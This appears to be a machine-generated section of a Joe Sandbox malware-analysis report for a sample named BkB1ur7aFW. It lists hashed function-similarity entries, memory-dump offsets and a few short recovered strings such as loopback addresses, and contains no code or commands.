                                                              Similarity
                                                              • API ID:
                                                              • String ID: H$xn--
                                                              • API String ID: 0-4022323365
                                                              • Opcode ID: 2bbdfb34b130b8f4256b61872e90278cf9ddadab548dc9f766a57435d3ee466e
                                                              • Instruction ID: 782c2ef18b474558e2595088fb2ef328621a8bb4eacf161f94c5edfb10a75933
                                                              • Opcode Fuzzy Hash: 2bbdfb34b130b8f4256b61872e90278cf9ddadab548dc9f766a57435d3ee466e
                                                              • Instruction Fuzzy Hash: 88E12B717087158BDB28DE28D8C072AB7E2ABC8354F19CA3DD9DA87391E778DC458742
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Downgrades to HTTP/1.1$multi.c
                                                              • API String ID: 0-3089350377
                                                              • Opcode ID: 31b282160095ed9dad4b154d24f0b30ac0e4912bbf7baa67c2b181d87c687fae
                                                              • Instruction ID: 25e2539a6f445d4ac5f985f2d84ab697702591ca4d40836c09da2084e4fac539
                                                              • Opcode Fuzzy Hash: 31b282160095ed9dad4b154d24f0b30ac0e4912bbf7baa67c2b181d87c687fae
                                                              • Instruction Fuzzy Hash: 19C12871A08301ABE7109F64D88176BB7E0BF95308F04853EF549673E2E778E959CB86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 127.0.0.1$::1
                                                              • API String ID: 0-3302937015
                                                              • Opcode ID: 07f9dee429b838c54e72403fafeb4f8d524ef1824b182fe3fae462d4ff98cdd3
                                                              • Instruction ID: 002e3e633acff48eb42faf9fc05b7d7fe86d8df52b6fd38580a3b68725919196
                                                              • Opcode Fuzzy Hash: 07f9dee429b838c54e72403fafeb4f8d524ef1824b182fe3fae462d4ff98cdd3
                                                              • Instruction Fuzzy Hash: 73A1F571C04342ABE700DF65C845767B3E0AF9A304F15862AF9488B362F779ED90D7A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ME
                                                              • API String ID: 0-2807042251
                                                              • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                              • Instruction ID: 1d8120deac137974c5fe4c9febdf492ce9518c7bc96c70629c5d2c6096f21208
                                                              • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                              • Instruction Fuzzy Hash: 082264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: D
                                                              • API String ID: 0-2746444292
                                                              • Opcode ID: abc93120844dcb078d04df584af388602c4da3052e158adea212c8b27998d9d7
                                                              • Instruction ID: fc946c88faebe27d3d688313a82e4edb4ef87dcbbadfe98c99ce327903569d5f
                                                              • Opcode Fuzzy Hash: abc93120844dcb078d04df584af388602c4da3052e158adea212c8b27998d9d7
                                                              • Instruction Fuzzy Hash: 00328D7190C3818BC325DF28D4806AEF7E1BFC9304F198A6DE9D967351EB74A945CB82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H
                                                              • API String ID: 0-2852464175
                                                              • Opcode ID: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                                              • Instruction ID: 7e7ae7d21440ba95732345616ac4a3b25949fc27ccb1b1dfcc9f94466a2ace4e
                                                              • Opcode Fuzzy Hash: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                                              • Instruction Fuzzy Hash: AD91E935708351CFCB58CE1CC490A2EF3E3ABC9314F1A857ED99697391DA359C468B8A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 62dcb89cf0738f91ea3545528969f5110dd24b330ddba6349a8eee62cb4f7c04
                                                              • Instruction ID: ea951d877adafda98f0102872e27c954f7373733abc3ed7853f3d763aef96833
                                                              • Opcode Fuzzy Hash: 62dcb89cf0738f91ea3545528969f5110dd24b330ddba6349a8eee62cb4f7c04
                                                              • Instruction Fuzzy Hash: 81D017FB64C5606DB201C0127B68AFAA36EE0C5731332C96BF443C100AE3984A4E51B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 37dcff668a13ac7664a65d074101e8d45831704a40427edf5dff100c5f881fab
                                                              • Instruction ID: 6bbd0e82836daf3a08b79673ecdc5ca19951ebbe2de9b94d89cea05383d08447
                                                              • Opcode Fuzzy Hash: 37dcff668a13ac7664a65d074101e8d45831704a40427edf5dff100c5f881fab
                                                              • Instruction Fuzzy Hash: B312B676F483154FC30CED6DC992359FAD767C8310F1A893EA95ADB3A0E9B9EC014681
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a9ed142efbc3535bb558a8292013c1190d924a8c5fbda9f973594f51d174ed75
                                                              • Instruction ID: bf5e4803f800d1216db848e5db57cd828e7997dd575c968c8786113a19135211
                                                              • Opcode Fuzzy Hash: a9ed142efbc3535bb558a8292013c1190d924a8c5fbda9f973594f51d174ed75
                                                              • Instruction Fuzzy Hash: C5E1563095C31D8FD322CF09C54433ABBE2BB86350F25852DE69A8B395D778DD469B82
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72a2da86a39d650c682cc04dc614ae1369d45e25439c15332c6e890b86120e3d
                                                              • Instruction ID: 781d106259bf956257d085172b4ce8e62e53fe20c5dd367a1f5a6c69b3d18f4b
                                                              • Opcode Fuzzy Hash: 72a2da86a39d650c682cc04dc614ae1369d45e25439c15332c6e890b86120e3d
                                                              • Instruction Fuzzy Hash: BDC159B16056018BD328DF19C490269FBE1FF91310F29866DD5AE8F792DB38E985CB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49e37e3fb03f93da9d9d649f0b3f10027f9cefc4c25519c2e446c373813ed613
                                                              • Instruction ID: 0f850c01197cc529f671d6522463f533ef78ce2bac9fcc6c525fd42b6b94ff0e
                                                              • Opcode Fuzzy Hash: 49e37e3fb03f93da9d9d649f0b3f10027f9cefc4c25519c2e446c373813ed613
                                                              • Instruction Fuzzy Hash: 4DA116757083118FC758CF2CC480B2BB7E6AFC6310F59862EE59597391E638DC468B8A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                                              • Instruction ID: 750e18befe729ba41cd2ef3fc77cae6c0d01cbaeb71d3bcea8d498a6dcaecd51
                                                              • Opcode Fuzzy Hash: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                                              • Instruction Fuzzy Hash: 4FA19231A001598FEB38DE29CCC5FDA73A2EBCD310F0A8525EC599F391EA34AD458795
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4119c6def6842a138ba71f0cb8e736636a22bb00ce861d21a8acd0234f799ab4
                                                              • Instruction ID: ca6cc78b2566e7161a8114ccd3243df0e4a7f51ca0df0f168d4af31cb63ff9f4
                                                              • Opcode Fuzzy Hash: 4119c6def6842a138ba71f0cb8e736636a22bb00ce861d21a8acd0234f799ab4
                                                              • Instruction Fuzzy Hash: B6C10571914B419BD722CF38C881BEBB7E1BFD9300F109A1EE8EA96241EB747584CB55
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: [
                                                              • API String ID: 0-784033777
                                                              • Opcode ID: 9e852875622c2d34a309df10353ae372f772b379f8aa8779088bafef30e164bf
                                                              • Instruction ID: 8bc4abd00fd8dec1fd6d5c24b5a12795f58965501a855411a2a2596d3c7202e3
                                                              • Opcode Fuzzy Hash: 9e852875622c2d34a309df10353ae372f772b379f8aa8779088bafef30e164bf
                                                              • Instruction Fuzzy Hash: 6DB147716083615BDB358A24888473B7AD8EB55307F9A052FECC5C7283EA3DE94C875B